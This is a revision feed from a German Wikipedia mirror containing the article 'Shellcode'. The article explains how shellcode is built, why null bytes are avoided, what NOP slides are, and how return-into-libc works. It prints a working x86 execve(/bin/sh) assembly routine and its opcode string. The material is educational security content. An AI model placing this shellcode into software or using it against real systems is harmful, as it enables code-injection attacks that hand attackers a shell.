https://wiki-de.moshellshocker.dns64.de/index.php?action=history&feed=atom&title=ShellcodeShellcode - Versionsgeschichte2026-06-10T21:19:44ZVersionsgeschichte dieser Seite in Wikipedia (Deutsch) – Lokale KopieMediaWiki 1.43.8https://wiki-de.moshellshocker.dns64.de/index.php?title=Shellcode&diff=82931&oldid=previmported>Aka: /* Lokaler execve(/bin/sh) Shellcode */ Tippfehler entfernt2020-06-18T17:13:15Z<p><span class="autocomment">Lokaler execve(/bin/sh) Shellcode: </span> <a href="/index.php?title=Benutzer:Aka/Tippfehler_entfernt&action=edit&redlink=1" class="new" title="Benutzer:Aka/Tippfehler entfernt (Seite nicht vorhanden)">Tippfehler entfernt</a></p>
<p><b>Neue Seite</b></p><div>'''Shellcode''' ist ein Begriff aus der [[Programmierung]] und bezeichnet einen zumeist sehr kleinen Patch von in [[Opcode]]s umgewandelten [[Assemblersprache|Assemblerbefehlen]], mit denen beabsichtigt wird, ein Programm oder System zu manipulieren, oder für nicht vorgesehene Zwecke auszunutzen. Dabei wird oft versucht, eine [[Kommandozeileninterpreter|Shell]] zu starten, daher auch der Name. Shellcodes haben ihren Ursprung in [[Pufferüberlauf]]- und anderen Code-Injektions-Attacken, sie können aber auch bei [[Softwaretest|Software-]], insbesondere [[Penetrationstest (Informatik)|Penetrationstests]] zum Einsatz kommen, beim Experimentieren und in der Didaktik.<br />
<br />
== Erstellen von Shellcodes ==<br />
Zur Erzeugung von Shellcode kann der auszuführende Befehl in [[C (Programmiersprache)|C]] geschrieben und mit einem [[Compiler]] übersetzt werden. Das erzeugte Programm wird nun disassembliert (rückübersetzt) und die Funktionsweise des Programms in Assemblersprache nachprogrammiert. Viele Instruktionen können aber weggelassen oder verkürzt werden. Bei vielen [[Exploit]]s darf im Shellcode kein [[Nullzeichen|0-Byte]] enthalten sein, weil dieses in C das String-Ende markiert. Im Allgemeinen müssen weitere Hindernisse umgangen werden, beispielsweise werden nur Buchstaben und Zahlen zugelassen oder die Groß- und Kleinschreibung verändert, oder es müssen bestimmte Offsets eingehalten werden, was etwa durch Auffüllen mit mehr oder minder kreativen Ketten von [[Nulloperation]]en (sog. ''NOP Slides'') erreicht werden kann.<br />
<br />
Anstatt eigenen Code auszuführen, was nicht immer möglich ist (zum Beispiel bei Verwendung von [[Speicherschutz]]), kann man auch direkt zu gewünschten Funktionen springen, die beispielsweise im Programm selber oder einer geladenen [[Programmbibliothek|Bibliothek]], beispielsweise der libc vorhanden sind. Dieses Verfahren wird [[return into libc]] genannt.<br />
<br />
== Beispiel ==<br />
<br />
=== Lokaler execve(/bin/sh) Shellcode ===<br />
Der Assembler-Code (x86-Architektur):<ref>Quelle: {{Webarchiv | url=http://www.phrack.org/archives/49/P49-14 | wayback=20080211101739 | text=phrack.org}}<!-- Ursprünglich wohl http://www.phrack.org/phrack/49/P49-14, liefert jetzt aber 404. --></ref><br />
<br />
<syntaxhighlight lang="asm"><br />
void main() {<br />
__asm__("<br />
jmp 0x2a # 3 bytes - springt direkt vor den String<br />
popl %esi # 1 byte - Adresse des Strings wird in esi geladen<br />
movl %esi,0x8(%esi) # 3 bytes - die Adresse des Strings wird in den Speicher geschrieben<br />
movb $0x0,0x7(%esi) # 4 bytes - der String wird nullterminiert<br />
movl $0x0,0xc(%esi) # 7 bytes - ein nullpointer für das environment<br />
movl $0xb,%eax # 5 bytes - syscall-nummer in eax<br />
movl %esi,%ebx # 2 bytes - ebx enthält die adresse von "/bin/sh"<br />
leal 0x8(%esi),%ecx # 3 bytes - argumente, ein pointer auf den string und ein nullpointer<br />
leal 0xc(%esi),%edx # 3 bytes - environment<br />
int $0x80 # 2 bytes - interrupt wird ausgelöst<br />
movl $0x1, %eax # 5 bytes - exit-interrupt<br />
movl $0x0, %ebx # 5 bytes - wird vorbereitet<br />
int $0x80 # 2 bytes - interrupt wird ausgelöst<br />
call -0x2f # 5 bytes - ein call zurück, dabei wird der eip auf den Stack gepusht<br />
.string \"/bin/sh\" # 8 bytes<br />
");<br />
}<br />
</syntaxhighlight><br />
<br />
Der Opcode String:<br />
<syntaxhighlight lang="asm"><br />
char shellcode[] =<br />
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"<br />
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"<br />
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"<br />
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";<br />
</syntaxhighlight><br />
<br />
Dieser Code ist jedoch nicht sonderlich geschickt, da er Nullbytes enthält und recht lang ist. Zur Vermeidung von „unerwünschten Zeichen“ werden häufig auch Encoder verwendet, welche eine Maskierung und spätere Demaskierung dieser Zeichen ermöglichen und den Shellcode eventuell noch zusätzlich komprimieren. Es gibt auch noch andere Techniken, die Adresse des Strings herauszufinden, als einen „jmp“ oder „call“. Es ist beispielsweise möglich, lediglich <code>/bin/sh</code> auf den Stack zu pushen. Danach enthält der ''esp'' die Adresse.<br />
<br />
== Literatur ==<br />
* Jack Koziol: ''The Shellcoder’s Handbook. Discovering and Exploiting Security Holes.'' Wiley, Indianapolis IN 2004, ISBN 0-7645-4468-3.<br />
* Jon Erickson: ''Forbidden Code.'' mitp, Bonn 2004, ISBN 3-8266-1457-7.<br />
<br />
== Weblinks ==<br />
* [http://www.shell-storm.org/shellcode/ Shellcode database]<br />
<br />
== Einzelnachweise ==<br />
<references /><br />
<br />
[[Kategorie:IT-Sicherheit]]<br />
[[Kategorie:Hackertechnik (Computersicherheit)]]</div>imported>Aka